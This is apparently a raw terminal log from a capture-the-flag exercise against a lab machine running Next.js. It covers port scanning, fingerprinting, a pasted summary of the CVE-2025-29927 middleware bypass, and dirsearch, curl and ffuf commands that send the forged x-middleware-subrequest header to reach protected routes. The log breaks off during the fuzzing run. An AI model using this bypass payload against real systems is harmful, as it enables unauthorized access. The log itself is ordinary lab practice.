NSE: [http-favicon 10.10.11.83:80] No favicon found.
NSE: Finished http-favicon against 10.10.11.83:80.
NSE: Finished http-methods against 10.10.11.83:80.
NSE: Finished http-cors against 10.10.11.83:80.
NSE: Finished ssh-hostkey against 10.10.11.83:22.
Completed NSE at 17:57, 5.91s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:57
NSE: Starting http-server-header against 10.10.11.83:80.
NSE: Finished http-server-header against 10.10.11.83:80.
Completed NSE at 17:57, 0.96s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:57
Completed NSE at 17:57, 0.01s elapsed
Nmap scan report for previous.htb (10.10.11.83)
Host is up, received user-set (0.20s latency).
Scanned at 2025-09-03 17:57:23 UTC for 22s
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
|_http-title: PreviousJS
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Final times for host: srtt: 202035 rttvar: 3885 to: 217575
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:57
NSE: Starting ssh-hostkey.
NSE: Finished ssh-hostkey.
Completed NSE at 17:57, 0.02s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:57
Completed NSE at 17:57, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:57
Completed NSE at 17:57, 0.01s elapsed
Read from /usr/share/nmap: nmap-protocols nmap-service-probes nmap-services.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.07 seconds
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl -I http://previous.htb
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 03 Sep 2025 18:02:26 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 5493
Connection: keep-alive
X-Powered-By: Next.js
ETag: "17m2fyh3hl048k"
Vary: Accept-Encoding
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # webtech --urls http://previous.htb
Target URL: http://previous.htb
Detected technologies:
- Next.js
- Nginx 1.18.0
- Ubuntu
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl -s "http://previous.htb" | grep -o 'href="[^"]*"' | sort -u
href="/_next/static/css/9a1ff1f4870b5a50.css"
href="mailto:jeremy@previous.htb"
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl -s "http://previous.htb" | grep -o '"buildId":"[^"]*"'
"buildId":"qVDR2cKpRgqCslEh-llk9"
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl -s "http://previous.htb" | grep -oP '(?<=<title data-next-head="">).*?(?=</title>)'
PreviousJS
> Google AI
Recent JavaScript CVEs (2024–2025)
Next.js authorization bypass (CVE-2025-29927)
Vulnerability: A flaw in the Next.js middleware could allow an attacker to bypass critical security checks, including authentication. By manipulating the internal x-middleware-subrequest header, an attacker could skip the middleware layer and access protected routes.
Affected versions: Next.js versions before 12.3.5, 13.5.9, 14.2.25, and 15.2.3.
Resolution: Vercel, the developer of Next.js, released patches to fix the vulnerability and provided details in a postmortem report.
> Reference
https://www.offsec.com/blog/cve-2025-29927/
https://securitylabs.datadoghq.com/articles/nextjs-middleware-auth-bypass/
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # dirsearch -u http://previous.htb -H "x-nextjs-data: 1" -H "x-middleware-subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware" -e php,html,js,txt,json,env
_|. _ _ _ _ _ | v0.4.3
(_||| ) (/(_|| (_| )
Extensions: php, html, js, txt, json, env
HTTP method: GET | Threads: 25 | Wordlist size: 11985
Output File: /home/Krypt0n/reports/http_previous.htb/_25-09-03_17-33-09.txt
Target: http://previous.htb/
[17:33:09] Starting:
[17:35:12] 308 - 19B - /axis//happyaxis.jsp -> /axis/happyaxis.jsp
[17:35:12] 308 - 30B - /axis2//axis2-web/HappyAxis.jsp -> /axis2/axis2-web/HappyAxis.jsp
[17:35:12] 308 - 24B - /axis2-web//HappyAxis.jsp -> /axis2-web/HappyAxis.jsp
[17:35:27] 308 - 52B - /Citrix//AccessPlatform/auth/clientscripts/cookies.js -> /Citrix/AccessPlatform/auth/clientscripts/cookies.js
[17:35:53] 200 - 3KB - /docs
[17:35:54] 200 - 1KB - /docs/CHANGELOG.html
[17:35:54] 200 - 1KB - /docs/export-demo.xml
[17:35:54] 200 - 1KB - /docs/swagger.json
[17:35:54] 200 - 1KB - /docs/updating.txt
[17:35:54] 200 - 1KB - /docs/changelog.txt
[17:35:54] 200 - 1KB - /docs/maintenance.txt
[17:36:01] 308 - 42B - /engine/classes/swfupload//swfupload_f9.swf -> /engine/classes/swfupload/swfupload_f9.swf
[17:36:02] 308 - 39B - /engine/classes/swfupload//swfupload.swf -> /engine/classes/swfupload/swfupload.swf
[17:36:07] 308 - 27B - /extjs/resources//charts.swf -> /extjs/resources/charts.swf
[17:36:25] 308 - 37B - /html/js/misc/swfupload//swfupload.swf -> /html/js/misc/swfupload/swfupload.swf
[17:38:46] 200 - 3KB - /signin
Task Completed
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl -H "x-nextjs-data: 1" -H "x-middleware-subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware" http://previous.htb/docs/ | more
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:- 0 0 0 0 0 0 0 0 --:--:-- 0:0 0 0 0 0 0 0 0 0 --:--:-- 0:0 0 0 0 0 0 0 0 0 --:--:-- 0:0100 5 0 5 0 0 1 0 --:--:-- 0:00:03 --:--:-- 1
/docs
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl http://previous.htb/docs/ | more
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:- 0 0 0 0 0 0 0 0 --:--:-- 0:0 0 0 0 0 0 0 0 0 --:--:-- 0:0 0 0 0 0 0 0 0 0 --:--:-- 0:0100 5 0 5 0 0 1 0 --:--:-- 0:00:03 --:--:-- 1
/docs
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl http://previous.htb/docs/CHANGELOG.html | more
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:- 0 0 0 0 0 0 0 0 --:--:-- --:-100 53 0 53 0 0 120 0 --:--:-- --:--:-- --:--:-- 121
/api/auth/signin?callbackUrl=%2Fdocs%2FCHANGELOG.html
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl http://previous.htb/docs/export-demo.xml | more
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:-100 54 0 54 0 0 124 0 --:--:-- --:--:-- --:--:-- 125
/api/auth/signin?callbackUrl=%2Fdocs%2Fexport-demo.xml
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl http://previous.htb/docs/swagger.json | more % Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:-100 51 0 51 0 0 119 0 --:--:-- --:--:-- --:--:-- 120
/api/auth/signin?callbackUrl=%2Fdocs%2Fswagger.json
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl http://previous.htb/docs/updating.txt | more % Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:- 0 0 0 0 0 0 0 0 --:--:-- 0:0 0 0 0 0 0 0 0 0 --:--:-- 0:0 0 0 0 0 0 0 0 0 --:--:-- 0:0 0 0 0 0 0 0 0 0 --:--:-- 0:0 0 0 0 0 0 0 0 0 --:--:-- 0:0 0 0 0 0 0 0 0 0 --:--:-- 0:0 0 0 0 0 0 0 0 0 --:--:-- 0:0100 51 0 51 0 0 6 0 --:--:-- 0:0100 51 0 51 0 0 6 0 --:--:-- 0:00:07 --:--:-- 14
/api/auth/signin?callbackUrl=%2Fdocs%2Fupdating.txt
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl http://previous.htb/docs/changelog.txt | more
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:-100 52 0 52 0 0 117 0 --:--:-- --:--:-- --:--:-- 117
/api/auth/signin?callbackUrl=%2Fdocs%2Fchangelog.txt
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl http://previous.htb/docs/maintenance.txt | more
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:-100 54 0 54 0 0 125 0 --:--:-- --:--:-- --:--:-- 125
/api/auth/signin?callbackUrl=%2Fdocs%2Fmaintenance.txt
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # dirsearch -u http://previous.htb/api -H 'x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware'
_|. _ _ _ _ _ | v0.4.3 (_||| ) (/(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET Threads: 25 | Wordlist size: 11460
Output File: /home/Krypt0n/reports/http_previous.htb/_api_25-09-04_05-27-44.txt
Target: http://previous.htb/
[05:27:45] Starting: api/
[05:27:57] 308 - 22B - /api/%2e%2e//google.com -> /api/%2E%2E/google.com [05:29:37] 400 - 64B - /api/auth/login.jsp
[05:29:37] 400 - 64B - /api/auth/admin
[05:29:37] 400 - 64B - /api/auth/adm
[05:29:37] 400 - 64B - /api/auth/login.html [05:29:38] 400 - 64B - /api/auth/login.aspx [05:29:38] 400 - 64B - /api/auth/logon [05:29:38] 400 - 64B - /api/auth/login.js
[05:29:38] 400 - 64B - /api/auth/login
[05:29:38] 400 - 64B - /api/auth/login.php
[05:29:38] 302 - 0B - /api/auth/signin -> /signin?callbackUrl=http%3A%2F%2Flocalhost%3A3000
[05:29:39] 308 - 28B - /api/axis2-web//HappyAxis.jsp -> /api/axis2-web/HappyAxis.jsp [05:29:39] 308 - 23B - /api/axis//happyaxis.jsp -> /api/axis/happyaxis.jsp
[05:29:40] 308 - 34B - /api/axis2//axis2-web/HappyAxis.jsp -> /api/axis2/axis2-web/HappyAxis.jsp
[05:30:08] 308 - 56B - /api/Citrix//AccessPlatform/auth/clientscripts/cookies.js -> /api/Citrix/AccessPlatform/auth/clientscripts/cookies.js
[05:30:45] 400 - 28B - /api/download
[05:30:54] 308 - 46B - /api/engine/classes/swfupload//swfupload_f9.swf -> /api/engine/classes/swfupload/swfupload_f9.swf
[05:30:54] 308 - 43B - /api/engine/classes/swfupload//swfupload.swf -> /api/engine/classes/swfupload/swfupload.swf
[05:31:00] 308 - 31B - /api/extjs/resources//charts.swf -> /api/extjs/resources/charts.swf
[05:31:24] 308 - 41B - /api/html/js/misc/swfupload//swfupload.swf -> /api/html/js/misc/swfupload/swfupload.swf
Task Completed
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~/Tool # ffuf -u 'http://previous.htb/api/download?FUZZ=a' -w ~/Tool/fuzzDicts/paramDict/AllParam.txt -H 'x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware' -mc all -fw 2 -c
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ /\ \/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://previous.htb/api/download?FUZZ=a
:: Wordlist : FUZZ: /home/Krypt0n/Tool/fuzzDicts/paramDict/AllParam.txt
:: Header : X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response words: 2
________________________________________________
:: Progress: [40/74332] :: Job [1/1] :: 0 req/sec :: Durati:: Progress: [40/74332] :: Job [1/1] :: 0 req/sec :: Durati:: Progress: [40/74332] :: Job [1/1] :: 0 req/sec :: Durati:: Progress: [40/74332] :: Job [1/1] :: 0 req/sec :: Durati:: Progress: [61/74332] :: Job [1/1] :: 0 req/sec :: Durati:: Progress: [80/74332] :: Job [1/1] :: 0 req/sec :: Durati:: Progress: [120/74332] :: Job [1/1] :: 0 req/sec :: Durat:: Progress: [120/74332] :: Job [1/1] :: 0 req/sec :: Durat:: Progress: [143/74332] :: Job [1/1] :: 188 req/sec :: Dur:: Progress: [169/74332] :: Job [1/1] :: 193 req/sec :: Dur:: Progress: [196/74332] :: Job [1/1] :: 198 req/sec :: Dur:: Progress: [212/74332] :: Job [1/1] :: 191 req/sec :: Dur:: Progress: [239/74332] :: Job [1/1] :: 189 req/sec :: Dur:: Progress: [256/74332] :: Job [1/1] :: 174 req/sec :: Dur:: Progress: [290/74332] :: Job [1/1] :: 187 req/sec :: Dur:: Progress: [299/74332] :: Job [1/1] :: 180 req/sec :: Dur:: Progress: [332/74332] :: Job [1/1] :: 195 req/sec :: Dur:: Progress: [347/74332] :: Job [1/1] :: 179 req/sec :: Dur:: Progress: [372/74332] :: Job [1/1] :: 196 req/sec :: Dur:: Progress: [387/74332] :: Job [1/1] :: 173 req/sec :: Dur:: Progress: [412/74332] :: Job [1/1] :: 195 req/sec :: Dur:: Progress: [440/74332] :: Job [1/1] :: 180 req/sec :: Dur:: Progress: [452/74332] :: Job [1/1] :: 195 req/sec :: Dur:: Progress: [480/74332] :: Job [1/1] :: 173 req/sec :: Dur:: Progress: [497/74332] :: Job [1/1] :: 170 req/sec :: Dur:: Progress: [524/74332] :: Job [1/1] :: 173 req/sec :: Dur:: Progress: [545/74332] :: Job [1/1] :: 177 req/sec :: Dur:: Progress: [564/74332] :: Job [1/1] :: 174 req/sec :: Dur:: Progress: [590/74332] :: Job [1/1] :: 177 req/sec :: Dur:: Progress: [612/74332] :: Job [1/1] :: 186 req/sec :: Dur:: Progress: [637/74332] :: Job [1/1] :: 174 req/sec :: Dur:: Progress: [654/74332] :: Job [1/1] :: 183 req/sec :: Dur:: Progress: [665/74332] :: Job [1/1] :: 184 req/sec :: Dur:: Progress: [704/74332] :: Job [1/1] :: 181 req/sec :: Dur:: Progress: [711/74332] :: Job [1/1] :: 168 req/sec :: Dur:: Progress: [741/74332] :: Job [1/1] :: 178 req/sec :: Dur:: Progress: [762/74332] :: Job [1/1] :: 169 req/sec :: Dur:: Progress: [785/74332] :: Job [1/1] :: 175 req/sec :: Dur:: Progress: [819/74332] :: Job [1/1] :: 186 req/sec :: Dur:: Progress: [825/74332] :: Job [1/1] :: 176 req/sec :: Dur:: Progress: [860/74332] :: Job [1/1] :: 179 req/sec :: Dur:: Progress: [865/74332] :: Job [1/1] :: 189 req/sec :: Dur:: Progress: [901/74332] :: Job [1/1] :: 180 req/sec :: Dur:: Progress: [913/74332] :: Job [1/1] :: 181 req/sec :: Dur:: Progress: [943/74332] :: Job [1/1] :: 178 req/sec :: Dur:: Progress: [962/74332] :: Job [1/1] :: 177 req/sec :: Dur:: Progress: [985/74332] :: Job [1/1] :: 193 req/sec :: Dur:: Progress: [1017/74332] :: Job [1/1] :: 176 req/sec :: Du:: Progress: [1026/74332] :: Job [1/1] :: 184 req/sec :: Du:: Progress: [1060/74332] :: Job [1/1] :: 180 req/sec :: Du:: Progress: [1068/74332] :: Job [1/1] :: 181 req/sec :: Du:: Progress: [1105/74332] :: Job [1/1] :: 197 req/sec :: Du:: Progress: [1127/74332] :: Job [1/1] :: 184 req/sec :: Du:: Progress: [1145/74332] :: Job [1/1] :: 196 req/sec :: Du:: Progress: [1172/74332] :: Job [1/1] :: 184 req/sec :: Du:: Progress: [1187/74332] :: Job [1/1] :: 191 req/sec :: Du:: Progress: [1207/74332] :: Job [1/1] :: 179 req/sec :: Du:: Progress: [1229/74332] :: Job [1/1] :: 188 req/sec :: Du:: Progress: [1251/74332] :: Job [1/1] :: 172 req/sec :: Du:: Progress: [1269/74332] :: Job [1/1] :: 188 req/sec :: Du:: Progress: [1303/74332] :: Job [1/1] :: 175 req/sec :: Du:: Progress: [1309/74332] :: Job [1/1] :: 186 req/sec :: Du:: Progress: [1348/74332] :: Job [1/1] :: 190 req/sec :: Du:: Progress: [1350/74332] :: Job [1/1] :: 168 req/sec :: Du:: Progress: [1389/74332] :: Job [1/1] :: 184 req/sec :: Du:: Progress: [1391/74332] :: Job [1/1] :: 166 req/sec :: Du:: Progress: [1429/74332] :: Job [1/1] :: 204 req/sec :: Du:: Progress: [1439/74332] :: Job [1/1] :: 176 req/sec :: Du:: Progress: [1469/74332] :: Job [1/1] :: 201 req/sec :: Du:: Progress: [1490/74332] :: Job [1/1] :: 173 req/sec :: Du:: Progress: [1511/74332] :: Job [1/1] :: 189 req/sec :: Du:: Progress: [1543/74332] :: Job [1/1] :: 175 req/sec :: Du:: Progress: [1551/74332] :: Job [1/1] :: 191 req/sec :: Du:: Progress: [1584/74332] :: Job [1/1] :: 171 req/sec :: Du:: Progress: [1591/74332] :: Job [1/1] :: 190 req/sec :: Du:: Progress: [1629/74332] :: Job [1/1] :: 189 req/sec :: Du:: Progress: [1639/74332] :: Job [1/1] :: 179 req/sec :: Du:: Progress: [1671/74332] :: Job [1/1] :: 193 req/sec :: Du:: Progress: [1681/74332] :: Job [1/1] :: 175 req/sec :: Du:: Progress: [1711/74332] :: Job [1/1] :: 192 req/sec :: Du:: Progress: [1731/74332] :: Job [1/1] :: 175 req/sec :: Du:: Progress: [1754/74332] :: Job [1/1] :: 187 req/sec :: Du:: Progress: [1779/74332] :: Job [1/1] :: 171 req/sec :: Du:: Progress: [1799/74332] :: Job [1/1] :: 183 req/sec :: Du:: Progress: [1823/74332] :: Job [1/1] :: 173 req/sec :: Du:: Progress: [1845/74332] :: Job [1/1] :: 184 req/sec :: Du:: Progress: [1873/74332] :: Job [1/1] :: 187 req/sec :: Du:: Progress: [1886/74332] :: Job [1/1] :: 185 req/sec :: Du:: Progress: [1887/74332] :: Job [1/1] :: 167 req/sec :: Du:: Progress: [1926/74332] :: Job [1/1] :: 183 req/sec :: Du:: Progress: [1927/74332] :: Job [1/1] :: 167 req/sec :: Du:: Progress: [1966/74332] :: Job [1/1] :: 181 req/sec :: Du:: Progress: [1970/74332] :: Job [1/1] :: 156 req/sec :: Du:: Progress: [2007/74332] :: Job [1/1] :: 171 req/sec :: Du:: Progress: [2018/74332] :: Job [1/1] :: 156 req/sec :: Du:: Progress: [2047/74332] :: Job [1/1] :: 172 req/sec :: Du:: Progress: [2068/74332] :: Job [1/1] :: 159 req/sec :: Du:: Progress: [2087/74332] :: Job [1/1] :: 193 req/sec :: Du:: Progress: [2111/74332] :: Job [1/1] :: 167 req/sec :: Du:: Progress: [2136/74332] :: Job [1/1] :: 183 req/sec :: Du:: Progress: [2142/74332] :: Job [1/1] :: 165 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2149/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [2189/74332] :: Job [1/1] :: 62 req/sec :: Dur:: Progress: [2195/74332] :: Job [1/1] :: 60 req/sec :: Dur:: Progress: [2229/74332] :: Job [1/1] :: 62 req/sec :: Dur:: Progress: [2235/74332] :: Job [1/1] :: 60 req/sec :: Dur:: Progress: [2244/74332] :: Job [1/1] :: 58 req/sec :: Dur:: Progress: [2248/74332] :: Job [1/1] :: 58 req/sec :: Dur:: Progress: [2253/74332] :: Job [1/1] :: 56 req/sec :: Dur:: Progress: [2253/74332] :: Job [1/1] :: 56 req/sec :: Dur:: Progress: [2263/74332] :: Job [1/1] :: 54 req/sec :: Dur:: Progress: [2265/74332] :: Job [1/1] :: 52 req/sec :: Dur:: Progress: [2267/74332] :: Job [1/1] :: 50 req/sec :: Dur:: Progress: [2270/74332] :: Job [1/1] :: 49 req/sec :: Dur:: Progress: [2274/74332] :: Job [1/1] :: 48 req/sec :: Dur:: Progress: [2282/74332] :: Job [1/1] :: 46 req/sec :: Dur:: Progress: [2286/74332] :: Job [1/1] :: 45 req/sec :: Dur:: Progress: [2290/74332] :: Job [1/1] :: 44 req/sec :: Dur:: Progress: [2297/74332] :: Job [1/1] :: 43 req/sec :: Dur:: Progress: [2303/74332] :: Job [1/1] :: 43 req/sec :: Dur:: Progress: [2310/74332] :: Job [1/1] :: 42 req/sec :: Dur:: Progress: [2314/74332] :: Job [1/1] :: 41 req/sec :: Dur:: Progress: [2314/74332] :: Job [1/1] :: 41 req/sec :: Dur:: Progress: [2315/74332] :: Job [1/1] :: 39 req/sec :: Dur:: Progress: [2337/74332] :: Job [1/1] :: 39 req/sec :: Dur:: Progress: [2346/74332] :: Job [1/1] :: 38 req/sec :: Dur:: Progress: [2379/74332] :: Job [1/1] :: 66 req/sec :: Dur:: Progress: [2401/74332] :: Job [1/1] :: 68 req/sec :: Dur:: Progress: [2419/74332] :: Job [1/1] :: 66 req/sec :: Dur:: Progress: [2442/74332] :: Job [1/1] :: 69 req/sec :: Dur:: Progress: [2459/74332] :: Job [1/1] :: 78 req/sec :: Dur:: Progress: [2474/74332] :: Job [1/1] :: 99 req/sec :: Dur:: Progress: [2499/74332] :: Job [1/1] :: 123 req/sec :: Du:: Progress: [2506/74332] :: Job [1/1] :: 124 req/sec :: Du:: Progress: [2544/74332] :: Job [1/1] :: 177 req/sec :: Du:: Progress: [2546/74332] :: Job [1/1] :: 176 req/sec :: Du:: Progress: [2547/74332] :: Job [1/1] :: 148 req/sec :: Du:: Progress: [2586/74332] :: Job [1/1] :: 162 req/sec :: Du:: Progress: [2587/74332] :: Job [1/1] :: 148 req/sec :: Du:: Progress: [2609/74332] :: Job [1/1] :: 135 req/sec :: Du:: Progress: [2628/74332] :: Job [1/1] :: 138 req/sec :: Du:: Progress: [2650/74332] :: Job [1/1] :: 135 req/sec :: Du:: Progress: [2661/74332] :: Job [1/1] :: 136 req/sec :: Du:: Progress: [2691/74332] :: Job [1/1] :: 133 req/sec :: Du:: Progress: [2694/74332] :: Job [1/1] :: 125 req/sec :: Du:: Progress: [2727/74332] :: Job [1/1] :: 141 req/sec :: Du:: Progress: [2733/74332] :: Job [1/1] :: 136 req/sec :: Du:: Progress: [2769/74332] :: Job [1/1] :: 149 req/sec :: Du:: Progress: [2773/74332] :: Job [1/1] :: 141 req/sec :: Du:: Progress: [2780/74332] :: Job [1/1] :: 127 req/sec :: Du:: Progress: [2789/74332] :: Job [1/1] :: 136 req/sec :: Du:: Progress: [2823/74332] :: Job [1/1] :: 142 req/sec :: Du:: Progress: [2829/74332] :: Job [1/1] :: 135 req/sec :: Du:: Progress: [2862/74332] :: Job [1/1] :: 147 req/sec :: Du:: Progress: [2867/74332] :: Job [1/1] :: 134 req/sec :: Du:: Progress: [2902/74332] :: Job [1/1] :: 151 req/sec :: Du:: Progress: [2902/74332] :: Job [1/1] :: 151 req/sec :: Du:: Progress: [2902/74332] :: Job [1/1] :: 151 req/sec :: Du:: Progress: [2905/74332] :: Job [1/1] :: 122 req/sec :: Du:: Progress: [2924/74332] :: Job [1/1] :: 113 req/sec :: Du:: Progress: [2937/74332] :: Job [1/1] :: 124 req/sec :: Du:: Progress: [2946/74332] :: Job [1/1] :: 109 req/sec :: Du:: Progress: [2977/74332] :: Job [1/1] :: 121 req/sec :: Du:: Progress: [2983/74332] :: Job [1/1] :: 121 req/sec :: Du:: Progress: [3018/74332] :: Job [1/1] :: 119 req/sec :: Du:: Progress: [3023/74332] :: Job [1/1] :: 121 req/sec :: Du:: Progress: [3058/74332] :: Job [1/1] :: 121 req/sec :: Du:: Progress: [3063/74332] :: Job [1/1] :: 130 req/sec :: Du:: Progress: [3103/74332] :: Job [1/1] :: 154 req/sec :: Du:: Progress: [3104/74332] :: Job [1/1] :: 142 req/sec :: Du:: Progress: [3143/74332] :: Job [1/1] :: 180 req/sec :: Du:: Progress: [3148/74332] :: Job [1/1] :: 163 req/sec :: Du:: Progress: [3183/74332] :: Job [1/1] :: 198 req/sec :: Du:: Progress: [3191/74332] :: Job [1/1] :: 170 req/sec :: Du:: Progress: [3224/74332] :: Job [1/1] :: 187 req/sec :: Du:: Progress: [3237/74332] :: Job [1/1] :: 165 req/sec :: Du:: Progress: [3268/74332] :: Job [1/1] :: 184 req/sec :: Du:: Progress: [3295/74332] :: Job [1/1] :: 170 req/sec :: Du:: Progress: [3308/74332] :: Job [1/1] :: 188 req/sec :: Du:: Progress: [3314/74332] :: Job [1/1] :: 178 req/sec :: Du:: Progress: [3354/74332] :: Job [1/1] :: 181 req/sec :: Du:: Progress: [3354/74332] :: Job [1/1] :: 181 req/sec :: Du:: Progress: [3394/74332] :: Job [1/1] :: 186 req/sec :: Du:: Progress: [3394/74332] :: Job [1/1] :: 186 req/sec :: Du:: Progress: [3434/74332] :: Job [1/1] :: 185 req/sec :: Du:: Progress: [3445/74332] :: Job [1/1] :: 161 req/sec :: Du:: Progress: [3464/74332] :: Job [1/1] :: 158 req/sec :: Du:: Progress: [3471/74332] :: Job [1/1] :: 157 req/sec :: Du:: Progress: [3505/74332] :: Job [1/1] :: 159 req/sec :: Du:: Progress: [3511/74332] :: Job [1/1] :: 159 req/sec :: Du:: Progress: [3551/74332] :: Job [1/1] :: 158 req/sec :: Du:: Progress: [3553/74332] :: Job [1/1] :: 145 req/sec :: Du:: Progress: [3565/74332] :: Job [1/1] :: 156 req/sec :: Du:: Progress: [3565/74332] :: Job [1/1] :: 156 req/sec :: Du:: Progress: [3605/74332] :: Job [1/1] :: 149 req/sec :: Du:: Progress: [3605/74332] :: Job [1/1] :: 149 req/sec :: Du:: Progress: [3641/74332] :: Job [1/1] :: 143 req/sec :: Du:: Progress: [3650/74332] :: Job [1/1] :: 139 req/sec :: Du:: Progress: [3683/74332] :: Job [1/1] :: 150 req/sec :: Du:: Progress: [3701/74332] :: Job [1/1] :: 140 req/sec :: Du:: Progress: [3725/74332] :: Job [1/1] :: 153 req/sec :: Du:: Progress: [3744/74332] :: Job [1/1] :: 138 req/sec :: Du:: Progress: [3765/74332] :: Job [1/1] :: 187 req/sec :: Du:: Progress: [3778/74332] :: Job [1/1] :: 170 req/sec :: Du:: Progress: [3806/74332] :: Job [1/1] :: 182 req/sec :: Du:: Progress: [3834/74332] :: Job [1/1] :: 173 req/sec :: Du:: Progress: [3849/74332] :: Job [1/1] :: 176 req/sec :: Du:: Progress: [3874/74332] :: Job [1/1] :: 169 req/sec :: Du:: Progress: [3890/74332] :: Job [1/1] :: 176 req/sec :: Du:: Progress: [3909/74332] :: Job [1/1] :: 161 req/sec :: Du:: Progress: [3924/74332] :: Job [1/1] :: 167 req/sec :: Du:: Progress: [3933/74332] :: Job [1/1] :: 158 req/sec :: Du:: Progress: [3947/74332] :: Job [1/1] :: 151 req/sec :: Du:: Progress: [3973/74332] :: Job [1/1] :: 162 req/sec :: Du:: Progress: [3985/74332] :: Job [1/1] :: 156 req/sec :: Du:: Progress: [4003/74332] :: Job [1/1] :: 139 req/sec :: Du:: Progress: [4016/74332] :: Job [1/1] :: 142 req/sec :: Du:: Progress: [4043/74332] :: Job [1/1] :: 138 req/sec :: Du:: Progress: [4054/74332] :: Job [1/1] :: 139 req/sec :: Du:: Progress: [4084/74332] :: Job [1/1] :: 137 req/sec :: Du:: Progress: [4106/74332] :: Job [1/1] :: 144 req/sec :: Du:: Progress: [4128/74332] :: Job [1/1] :: 147 req/sec :: Du:: Progress: [4160/74332] :: Job [1/1] :: 165 req/sec :: Du:: Progress: [4168/74332] :: Job [1/1] :: 158 req/sec :: Du:: Progress: [4179/74332] :: Job [1/1] :: 148 req/sec :: Du:: Progress: [4208/74332] :: Job [1/1] :: 179 req/sec :: 